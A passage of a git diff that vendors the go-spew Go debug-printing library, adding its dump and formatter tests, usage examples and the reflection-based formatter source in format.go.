"(*"+v3t+")("+v3Addr+")("+v3s2+")\n") + addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s2+")\n") +} + +func addPanicDumpTests() { + // Type that panics in its Stringer interface. + v := panicer(127) + nv := (*panicer)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "spew_test.panicer" + vs := "(PANIC=test panic)127" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") +} + +func addErrorDumpTests() { + // Type that has a custom Error interface. + v := customError(127) + nv := (*customError)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "spew_test.customError" + vs := "error: 127" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") +} + +// TestDump executes all of the tests described by dumpTests. +func TestDump(t *testing.T) { + // Setup tests. + addIntDumpTests() + addUintDumpTests() + addBoolDumpTests() + addFloatDumpTests() + addComplexDumpTests() + addArrayDumpTests() + addSliceDumpTests() + addStringDumpTests() + addInterfaceDumpTests() + addMapDumpTests() + addStructDumpTests() + addUintptrDumpTests() + addUnsafePointerDumpTests() + addChanDumpTests() + addFuncDumpTests() + addCircularDumpTests() + addPanicDumpTests() + addErrorDumpTests() + addCgoDumpTests() + + t.Logf("Running %d tests", len(dumpTests)) + for i, test := range dumpTests { + buf := new(bytes.Buffer) + spew.Fdump(buf, test.in) + s := buf.String() + if testFailed(s, test.wants) { + t.Errorf("Dump #%d\n got: %s %s", i, s, stringizeWants(test.wants)) + continue + } + } +} + +func TestDumpSortedKeys(t *testing.T) { + cfg := spew.ConfigState{SortKeys: true} + s := cfg.Sdump(map[int]string{1: "1", 3: "3", 2: "2"}) + expected := "(map[int]string) (len=3) {\n(int) 1: (string) (len=1) " + + "\"1\",\n(int) 2: (string) (len=1) \"2\",\n(int) 3: (string) " + + "(len=1) \"3\"\n" + + "}\n" + if s != expected { + t.Errorf("Sorted keys mismatch:\n %v %v", s, expected) + } + + s = cfg.Sdump(map[stringer]int{"1": 1, "3": 3, "2": 2}) + expected = "(map[spew_test.stringer]int) (len=3) {\n" + + "(spew_test.stringer) (len=1) stringer 1: (int) 1,\n" + + "(spew_test.stringer) (len=1) stringer 2: (int) 2,\n" + + "(spew_test.stringer) (len=1) stringer 3: (int) 3\n" + + "}\n" + if s != expected { + t.Errorf("Sorted keys mismatch:\n %v %v", s, expected) + } + + s = cfg.Sdump(map[pstringer]int{pstringer("1"): 1, pstringer("3"): 3, pstringer("2"): 2}) + expected = "(map[spew_test.pstringer]int) (len=3) {\n" + + "(spew_test.pstringer) (len=1) stringer 1: (int) 1,\n" + + "(spew_test.pstringer) (len=1) stringer 2: (int) 2,\n" + + "(spew_test.pstringer) (len=1) stringer 3: (int) 3\n" + + "}\n" + if spew.UnsafeDisabled { + expected = "(map[spew_test.pstringer]int) (len=3) {\n" + + "(spew_test.pstringer) (len=1) \"1\": (int) 1,\n" + + "(spew_test.pstringer) (len=1) \"2\": (int) 2,\n" + + "(spew_test.pstringer) (len=1) \"3\": (int) 3\n" + + "}\n" + } + if s != expected { + t.Errorf("Sorted keys mismatch:\n %v %v", s, expected) + } + + s = cfg.Sdump(map[customError]int{customError(1): 1, customError(3): 3, customError(2): 2}) + expected = "(map[spew_test.customError]int) (len=3) {\n" + + "(spew_test.customError) error: 1: (int) 1,\n" + + "(spew_test.customError) error: 2: (int) 2,\n" + + "(spew_test.customError) error: 3: (int) 3\n" + + "}\n" + if s != expected { + t.Errorf("Sorted keys mismatch:\n %v %v", s, expected) + } + +} diff --git a/vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go b/vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go new file mode 100644 index 0000000000..6ab180809a --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go @@ -0,0 +1,99 @@ +// Copyright (c) 2013-2016 Dave Collins +// +// Permission to use, copy, modify, and distribute this software for any +// purpose with or without fee is hereby granted, provided that the above +// copyright notice and this permission notice appear in all copies. +// +// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +// NOTE: Due to the following build constraints, this file will only be compiled +// when both cgo is supported and "-tags testcgo" is added to the go test +// command line. This means the cgo tests are only added (and hence run) when +// specifially requested. This configuration is used because spew itself +// does not require cgo to run even though it does handle certain cgo types +// specially. Rather than forcing all clients to require cgo and an external +// C compiler just to run the tests, this scheme makes them optional. +// +build cgo,testcgo + +package spew_test + +import ( + "fmt" + + "github.com/davecgh/go-spew/spew/testdata" +) + +func addCgoDumpTests() { + // C char pointer. + v := testdata.GetCgoCharPointer() + nv := testdata.GetCgoNullCharPointer() + pv := &v + vcAddr := fmt.Sprintf("%p", v) + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "*testdata._Ctype_char" + vs := "116" + addDumpTest(v, "("+vt+")("+vcAddr+")("+vs+")\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+"->"+vcAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+"->"+vcAddr+")("+vs+")\n") + addDumpTest(nv, "("+vt+")()\n") + + // C char array. + v2, v2l, v2c := testdata.GetCgoCharArray() + v2Len := fmt.Sprintf("%d", v2l) + v2Cap := fmt.Sprintf("%d", v2c) + v2t := "[6]testdata._Ctype_char" + v2s := "(len=" + v2Len + " cap=" + v2Cap + ") " + + "{\n 00000000 74 65 73 74 32 00 " + + " |test2.|\n}" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + + // C unsigned char array. + v3, v3l, v3c := testdata.GetCgoUnsignedCharArray() + v3Len := fmt.Sprintf("%d", v3l) + v3Cap := fmt.Sprintf("%d", v3c) + v3t := "[6]testdata._Ctype_unsignedchar" + v3t2 := "[6]testdata._Ctype_uchar" + v3s := "(len=" + v3Len + " cap=" + v3Cap + ") " + + "{\n 00000000 74 65 73 74 33 00 " + + " |test3.|\n}" + addDumpTest(v3, "("+v3t+") "+v3s+"\n", "("+v3t2+") "+v3s+"\n") + + // C signed char array. + v4, v4l, v4c := testdata.GetCgoSignedCharArray() + v4Len := fmt.Sprintf("%d", v4l) + v4Cap := fmt.Sprintf("%d", v4c) + v4t := "[6]testdata._Ctype_schar" + v4t2 := "testdata._Ctype_schar" + v4s := "(len=" + v4Len + " cap=" + v4Cap + ") " + + "{\n (" + v4t2 + ") 116,\n (" + v4t2 + ") 101,\n (" + v4t2 + + ") 115,\n (" + v4t2 + ") 116,\n (" + v4t2 + ") 52,\n (" + v4t2 + + ") 0\n}" + addDumpTest(v4, "("+v4t+") "+v4s+"\n") + + // C uint8_t array. + v5, v5l, v5c := testdata.GetCgoUint8tArray() + v5Len := fmt.Sprintf("%d", v5l) + v5Cap := fmt.Sprintf("%d", v5c) + v5t := "[6]testdata._Ctype_uint8_t" + v5s := "(len=" + v5Len + " cap=" + v5Cap + ") " + + "{\n 00000000 74 65 73 74 35 00 " + + " |test5.|\n}" + addDumpTest(v5, "("+v5t+") "+v5s+"\n") + + // C typedefed unsigned char array. + v6, v6l, v6c := testdata.GetCgoTypdefedUnsignedCharArray() + v6Len := fmt.Sprintf("%d", v6l) + v6Cap := fmt.Sprintf("%d", v6c) + v6t := "[6]testdata._Ctype_custom_uchar_t" + v6s := "(len=" + v6Len + " cap=" + v6Cap + ") " + + "{\n 00000000 74 65 73 74 36 00 " + + " |test6.|\n}" + addDumpTest(v6, "("+v6t+") "+v6s+"\n") +} diff --git a/vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go b/vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go new file mode 100644 index 0000000000..52a0971fb3 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go @@ -0,0 +1,26 @@ +// Copyright (c) 2013 Dave Collins +// +// Permission to use, copy, modify, and distribute this software for any +// purpose with or without fee is hereby granted, provided that the above +// copyright notice and this permission notice appear in all copies. +// +// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +// NOTE: Due to the following build constraints, this file will only be compiled +// when either cgo is not supported or "-tags testcgo" is not added to the go +// test command line. This file intentionally does not setup any cgo tests in +// this scenario. +// +build !cgo !testcgo + +package spew_test + +func addCgoDumpTests() { + // Don't add any tests for cgo since this file is only compiled when + // there should not be any cgo tests. +} diff --git a/vendor/github.com/davecgh/go-spew/spew/example_test.go b/vendor/github.com/davecgh/go-spew/spew/example_test.go new file mode 100644 index 0000000000..c6ec8c6d59 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/example_test.go @@ -0,0 +1,226 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +package spew_test + +import ( + "fmt" + + "github.com/davecgh/go-spew/spew" +) + +type Flag int + +const ( + flagOne Flag = iota + flagTwo +) + +var flagStrings = map[Flag]string{ + flagOne: "flagOne", + flagTwo: "flagTwo", +} + +func (f Flag) String() string { + if s, ok := flagStrings[f]; ok { + return s + } + return fmt.Sprintf("Unknown flag (%d)", int(f)) +} + +type Bar struct { + data uintptr +} + +type Foo struct { + unexportedField Bar + ExportedField map[interface{}]interface{} +} + +// This example demonstrates how to use Dump to dump variables to stdout. +func ExampleDump() { + // The following package level declarations are assumed for this example: + /* + type Flag int + + const ( + flagOne Flag = iota + flagTwo + ) + + var flagStrings = map[Flag]string{ + flagOne: "flagOne", + flagTwo: "flagTwo", + } + + func (f Flag) String() string { + if s, ok := flagStrings[f]; ok { + return s + } + return fmt.Sprintf("Unknown flag (%d)", int(f)) + } + + type Bar struct { + data uintptr + } + + type Foo struct { + unexportedField Bar + ExportedField map[interface{}]interface{} + } + */ + + // Setup some sample data structures for the example. + bar := Bar{uintptr(0)} + s1 := Foo{bar, map[interface{}]interface{}{"one": true}} + f := Flag(5) + b := []byte{ + 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, + 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, + 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, + 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, + 0x31, 0x32, + } + + // Dump! + spew.Dump(s1, f, b) + + // Output: + // (spew_test.Foo) { + // unexportedField: (spew_test.Bar) { + // data: (uintptr) + // }, + // ExportedField: (map[interface {}]interface {}) (len=1) { + // (string) (len=3) "one": (bool) true + // } + // } + // (spew_test.Flag) Unknown flag (5) + // ([]uint8) (len=34 cap=34) { + // 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 |............... | + // 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 |!"#$%&'()*+,-./0| + // 00000020 31 32 |12| + // } + // +} + +// This example demonstrates how to use Printf to display a variable with a +// format string and inline formatting. +func ExamplePrintf() { + // Create a double pointer to a uint 8. + ui8 := uint8(5) + pui8 := &ui8 + ppui8 := &pui8 + + // Create a circular data type. + type circular struct { + ui8 uint8 + c *circular + } + c := circular{ui8: 1} + c.c = &c + + // Print! + spew.Printf("ppui8: %v\n", ppui8) + spew.Printf("circular: %v\n", c) + + // Output: + // ppui8: <**>5 + // circular: {1 <*>{1 <*>}} +} + +// This example demonstrates how to use a ConfigState. +func ExampleConfigState() { + // Modify the indent level of the ConfigState only. The global + // configuration is not modified. + scs := spew.ConfigState{Indent: "\t"} + + // Output using the ConfigState instance. + v := map[string]int{"one": 1} + scs.Printf("v: %v\n", v) + scs.Dump(v) + + // Output: + // v: map[one:1] + // (map[string]int) (len=1) { + // (string) (len=3) "one": (int) 1 + // } +} + +// This example demonstrates how to use ConfigState.Dump to dump variables to +// stdout +func ExampleConfigState_Dump() { + // See the top-level Dump example for details on the types used in this + // example. + + // Create two ConfigState instances with different indentation. + scs := spew.ConfigState{Indent: "\t"} + scs2 := spew.ConfigState{Indent: " "} + + // Setup some sample data structures for the example. + bar := Bar{uintptr(0)} + s1 := Foo{bar, map[interface{}]interface{}{"one": true}} + + // Dump using the ConfigState instances. + scs.Dump(s1) + scs2.Dump(s1) + + // Output: + // (spew_test.Foo) { + // unexportedField: (spew_test.Bar) { + // data: (uintptr) + // }, + // ExportedField: (map[interface {}]interface {}) (len=1) { + // (string) (len=3) "one": (bool) true + // } + // } + // (spew_test.Foo) { + // unexportedField: (spew_test.Bar) { + // data: (uintptr) + // }, + // ExportedField: (map[interface {}]interface {}) (len=1) { + // (string) (len=3) "one": (bool) true + // } + // } + // +} + +// This example demonstrates how to use ConfigState.Printf to display a variable +// with a format string and inline formatting. +func ExampleConfigState_Printf() { + // See the top-level Dump example for details on the types used in this + // example. + + // Create two ConfigState instances and modify the method handling of the + // first ConfigState only. + scs := spew.NewDefaultConfig() + scs2 := spew.NewDefaultConfig() + scs.DisableMethods = true + + // Alternatively + // scs := spew.ConfigState{Indent: " ", DisableMethods: true} + // scs2 := spew.ConfigState{Indent: " "} + + // This is of type Flag which implements a Stringer and has raw value 1. + f := flagTwo + + // Dump using the ConfigState instances. + scs.Printf("f: %v\n", f) + scs2.Printf("f: %v\n", f) + + // Output: + // f: 1 + // f: flagTwo +} diff --git a/vendor/github.com/davecgh/go-spew/spew/format.go b/vendor/github.com/davecgh/go-spew/spew/format.go new file mode 100644 index 0000000000..c49875bacb --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/format.go @@ -0,0 +1,419 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +package spew + +import ( + "bytes" + "fmt" + "reflect" + "strconv" + "strings" +) + +// supportedFlags is a list of all the character flags supported by fmt package. +const supportedFlags = "0-+# " + +// formatState implements the fmt.Formatter interface and contains information +// about the state of a formatting operation. The NewFormatter function can +// be used to get a new Formatter which can be used directly as arguments +// in standard fmt package printing calls. +type formatState struct { + value interface{} + fs fmt.State + depth int + pointers map[uintptr]int + ignoreNextType bool + cs *ConfigState +} + +// buildDefaultFormat recreates the original format string without precision +// and width information to pass in to fmt.Sprintf in the case of an +// unrecognized type. Unless new types are added to the language, this +// function won't ever be called. +func (f *formatState) buildDefaultFormat() (format string) { + buf := bytes.NewBuffer(percentBytes) + + for _, flag := range supportedFlags { + if f.fs.Flag(int(flag)) { + buf.WriteRune(flag) + } + } + + buf.WriteRune('v') + + format = buf.String() + return format +} + +// constructOrigFormat recreates the original format string including precision +// and width information to pass along to the standard fmt package. This allows +// automatic deferral of all format strings this package doesn't support. +func (f *formatState) constructOrigFormat(verb rune) (format string) { + buf := bytes.NewBuffer(percentBytes) + + for _, flag := range supportedFlags { + if f.fs.Flag(int(flag)) { + buf.WriteRune(flag) + } + } + + if width, ok := f.fs.Width(); ok { + buf.WriteString(strconv.Itoa(width)) + } + + if precision, ok := f.fs.Precision(); ok { + buf.Write(precisionBytes) + buf.WriteString(strconv.Itoa(precision)) + } + + buf.WriteRune(verb) + + format = buf.String() + return format +} + +// unpackValue returns values inside of non-nil interfaces when possible and +// ensures that types for values which have been unpacked from an interface +// are displayed when the show types flag is also set. +// This is useful for data types like structs, arrays, slices, and maps which +// can contain varying types packed inside an interface. +func (f *formatState) unpackValue(v reflect.Value) reflect.Value { + if v.Kind() == reflect.Interface { + f.ignoreNextType = false + if !v.IsNil() { + v = v.Elem() + } + } + return v +} + +// formatPtr handles formatting of pointers by indirecting them as necessary. +func (f *formatState) formatPtr(v reflect.Value) { + // Display nil if top level pointer is nil. + showTypes := f.fs.Flag('#') + if v.IsNil() && (!showTypes || f.ignoreNextType) { + f.fs.Write(nilAngleBytes) + return + } + + // Remove pointers at or below the current depth from map used to detect + // circular refs. + for k, depth := range f.pointers { + if depth >= f.depth { + delete(f.pointers, k) + } + } + + // Keep list of all dereferenced pointers to possibly show later. + pointerChain := make([]uintptr, 0) + + // Figure out how many levels of indirection there are by derferencing + // pointers and unpacking interfaces down the chain while detecting circular + // references. + nilFound := false + cycleFound := false + indirects := 0 + ve := v + for ve.Kind() == reflect.Ptr { + if ve.IsNil() { + nilFound = true + break + } + indirects++ + addr := ve.Pointer() + pointerChain = append(pointerChain, addr) + if pd, ok := f.pointers[addr]; ok && pd < f.depth { + cycleFound = true + indirects-- + break + } + f.pointers[addr] = f.depth + + ve = ve.Elem() + if ve.Kind() == reflect.Interface { + if ve.IsNil() { + nilFound = true + break + } + ve = ve.Elem() + } + } + + // Display type or indirection level depending on flags. + if showTypes && !f.ignoreNextType { + f.fs.Write(openParenBytes) + f.fs.Write(bytes.Repeat(asteriskBytes, indirects)) + f.fs.Write([]byte(ve.Type().String())) + f.fs.Write(closeParenBytes) + } else { + if nilFound || cycleFound { + indirects += strings.Count(ve.Type().String(), "*") + } + f.fs.Write(openAngleBytes) + f.fs.Write([]byte(strings.Repeat("*", indirects))) + f.fs.Write(closeAngleBytes) + } + + // Display pointer information depending on flags. + if f.fs.Flag('+') && (len(pointerChain) > 0) { + f.fs.Write(openParenBytes) + for i, addr := range pointerChain { + if i > 0 { + f.fs.Write(pointerChainBytes) + } + printHexPtr(f.fs, addr) + } + f.fs.Write(closeParenBytes) + } + + // Display dereferenced value. + switch { + case nilFound == true: + f.fs.Write(nilAngleBytes) + + case cycleFound == true: + f.fs.Write(circularShortBytes) + + default: + f.ignoreNextType = true + f.format(ve) + } +} + +// format is the main workhorse for providing the Formatter interface. It +// uses the passed reflect value to figure out what kind of object we are +// dealing with and formats it appropriately. It is a recursive function, +// however circular data structures are detected and handled properly. +func (f *formatState) format(v reflect.Value) { + // Handle invalid reflect values immediately. + kind := v.Kind() + if kind == reflect.Invalid { + f.fs.Write(invalidAngleBytes) + return + } + + // Handle pointers specially. + if kind == reflect.Ptr { + f.formatPtr(v) + return + } + + // Print type information unless already handled elsewhere. + if !f.ignoreNextType && f.fs.Flag('#') { + f.fs.Write(openParenBytes) + f.fs.Write([]byte(v.Type().String())) + f.fs.Write(closeParenBytes) + } + f.ignoreNextType = false + + // Call Stringer/error interfaces if they exist and the handle methods + // flag is enabled. + if !f.cs.DisableMethods { + if (kind != reflect.Invalid) && (kind != reflect.Interface) { + if handled := handleMethods(f.cs, f.fs, v); handled { + return + } + } + } + + switch kind { + case reflect.Invalid: + // Do nothing. We should never get here since invalid has already + // been handled above. + + case reflect.Bool: + printBool(f.fs, v.Bool()) + + case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int: + printInt(f.fs, v.Int(), 10) + + case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint: + printUint(f.fs, v.Uint(), 10) + + case reflect.Float32: + printFloat(f.fs, v.Float(), 32) + + case reflect.Float64: + printFloat(f.fs, v.Float(), 64) + + case reflect.Complex64: + printComplex(f.fs, v.Complex(), 32) + + case reflect.Complex128: + printComplex(f.fs, v.Complex(), 64) + + case reflect.Slice: + if v.IsNil() { + f.fs.Write(nilAngleBytes) + break + } + fallthrough + + case reflect.Array: + f.fs.Write(openBracketBytes) + f.depth++ + if (f.cs.MaxDepth != 0) && (f.depth > f.cs.MaxDepth) { + f.fs.Write(maxShortBytes) + } else { + numEntries := v.Len() + for i := 0; i < numEntries; i++ { + if i > 0 { + f.fs.Write(spaceBytes) + } + f.ignoreNextType = true + f.format(f.unpackValue(v.Index(i))) + } + } + f.depth-- + f.fs.Write(closeBracketBytes) + + case reflect.String: + f.fs.Write([]byte(v.String())) + + case reflect.Interface: + // The only time we should get here is for nil interfaces due to + // unpackValue calls. + if v.IsNil() { + f.fs.Write(nilAngleBytes) + } + + case reflect.Ptr: + // Do nothing. We should never get here since pointers have already + // been handled above. + + case reflect.Map: + // nil maps should be indicated as different than empty maps + if v.IsNil() { + f.fs.Write(nilAngleBytes) + break + } + + f.fs.Write(openMapBytes) + f.depth++ + if (f.cs.MaxDepth != 0) && (f.depth > f.cs.MaxDepth) { + f.fs.Write(maxShortBytes) + } else { + keys := v.MapKeys() + if f.cs.SortKeys { + sortValues(keys, f.cs) + } + for i, key := range keys { + if i > 0 { + f.fs.Write(spaceBytes) + } + f.ignoreNextType = true + f.format(f.unpackValue(key)) + f.fs.Write(colonBytes) + f.ignoreNextType = true + f.format(f.unpackValue(v.MapIndex(key))) + } + } + f.depth-- + f.fs.Write(closeMapBytes) + + case reflect.Struct: + numFields := v.NumField() + f.fs.Write(openBraceBytes) + f.depth++ + if (f.cs.MaxDepth != 0) && (f.depth > f.cs.MaxDepth) { + f.fs.Write(maxShortBytes) + } else { + vt := v.Type() + for i := 0; i < numFields; i++ { + if i > 0 { + f.fs.Write(spaceBytes) + } + vtf := vt.Field(i) + if f.fs.Flag('+') || f.fs.Flag('#') { + f.fs.Write([]byte(vtf.Name)) + f.fs.Write(colonBytes) + } + f.format(f.unpackValue(v.Field(i))) + } + } + f.depth-- + f.fs.Write(closeBraceBytes) + + case reflect.Uintptr: + printHexPtr(f.fs, uintptr(v.Uint())) + + case reflect.UnsafePointer, reflect.Chan, reflect.Func: + printHexPtr(f.fs, v.Pointer()) + + // There were not any other types at the time this code was written, but + // fall back to letting the default fmt package handle it if any get added. + default: + format := f.buildDefaultFormat() + if v.CanInterface() { + fmt.Fprintf(f.fs, format, v.Interface()) + } else { + fmt.Fprintf(f.fs, format, v.String()) + } + } +} + +// Format satisfies the fmt.Formatter interface. See NewFormatter for usage +// details. +func (f *formatState) Format(fs fmt.State, verb rune) { + f.fs = fs + + // Use standard formatting for verbs that are not v. + if verb != 'v' { + format := f.constructOrigFormat(verb) + fmt.Fprintf(fs, format, f.value) + return + } + + if f.value == nil { + if fs.Flag('#') { + fs.Write(interfaceBytes) + } + fs.Write(nilAngleBytes) + return + } + + f.format(reflect.ValueOf(f.value)) +} + +// newFormatter is a helper function to consolidate the logic from the various +// public methods which take varying config states. +func newFormatter(cs *ConfigState, v interface{}) fmt.Formatter { + fs := &formatState{value: v, cs: cs} + fs.pointers = make(map[uintptr]int) + return fs +} + +/* +NewFormatter returns a custom formatter that satisfies the fmt.Formatter +interface. As a result, it integrates cleanly with standard fmt package +printing functions. The formatter is useful for inline printing of smaller data +types similar to the standard %v format specifier. + +The custom formatter only responds to the %v (most compact), %+v (adds pointer +addresses), %#v (adds types), or %#+v (adds types and pointer addresses) verb +combinations. Any other verbs such as %x and %q will be sent to the the +standard fmt package for formatting. In addition, the custom formatter ignores +the width and precision arguments (however they will still work on the format +specifiers not handled by the custom formatter). + +Typically this function shouldn't be called directly. It is much easier to make +use of the custom formatter by calling one of the convenience functions such as +Printf, Println, or Fprintf. +*/ +func NewFormatter(v interface{}) fmt.Formatter { + return newFormatter(&Config, v) +} diff --git a/vendor/github.com/davecgh/go-spew/spew/format_test.go b/vendor/github.com/davecgh/go-spew/spew/format_test.go new file mode 100644 index 0000000000..f9b93abe86 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/format_test.go @@ -0,0 +1,1558 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +/* +Test Summary: +NOTE: For each test, a nil pointer, a single pointer and double pointer to the +base test element are also tested to ensure proper indirection across all types. + +- Max int8, int16, int32, int64, int +- Max uint8, uint16, uint32, uint64, uint +- Boolean true and false +- Standard complex64 and complex128 +- Array containing standard ints +- Array containing type with custom formatter on pointer receiver only +- Array containing interfaces +- Slice containing standard float32 values +- Slice containing type with custom formatter on pointer receiver only +- Slice containing interfaces +- Nil slice +- Standard string +- Nil interface +- Sub-interface +- Map with string keys and int vals +- Map with custom formatter type on pointer receiver only keys and vals +- Map with interface keys and values +- Map with nil interface value +- Struct with primitives +- Struct that contains another struct +- Struct that contains custom type with Stringer pointer interface via both + exported and unexported fields +- Struct that contains embedded struct and field to same struct +- Uintptr to 0 (null pointer) +- Uintptr address of real variable +- Unsafe.Pointer to 0 (null pointer) +- Unsafe.Pointer to address of real variable +- Nil channel +- Standard int channel +- Function with no params and no returns +- Function with param and no returns +- Function with multiple params and multiple returns +- Struct that is circular through self referencing +- Structs that are circular through cross referencing +- Structs that are indirectly circular +- Type that panics in its Stringer interface +- Type that has a custom Error interface +- %x passthrough with uint +- %#x passthrough with uint +- %f passthrough with precision +- %f passthrough with width and precision +- %d passthrough with width +- %q passthrough with string +*/ + +package spew_test + +import ( + "bytes" + "fmt" + "testing" + "unsafe" + + "github.com/davecgh/go-spew/spew" +) + +// formatterTest is used to describe a test to be performed against NewFormatter. +type formatterTest struct { + format string + in interface{} + wants []string +} + +// formatterTests houses all of the tests to be performed against NewFormatter. +var formatterTests = make([]formatterTest, 0) + +// addFormatterTest is a helper method to append the passed input and desired +// result to formatterTests. +func addFormatterTest(format string, in interface{}, wants ...string) { + test := formatterTest{format, in, wants} + formatterTests = append(formatterTests, test) +} + +func addIntFormatterTests() { + // Max int8. + v := int8(127) + nv := (*int8)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "int8" + vs := "127" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, 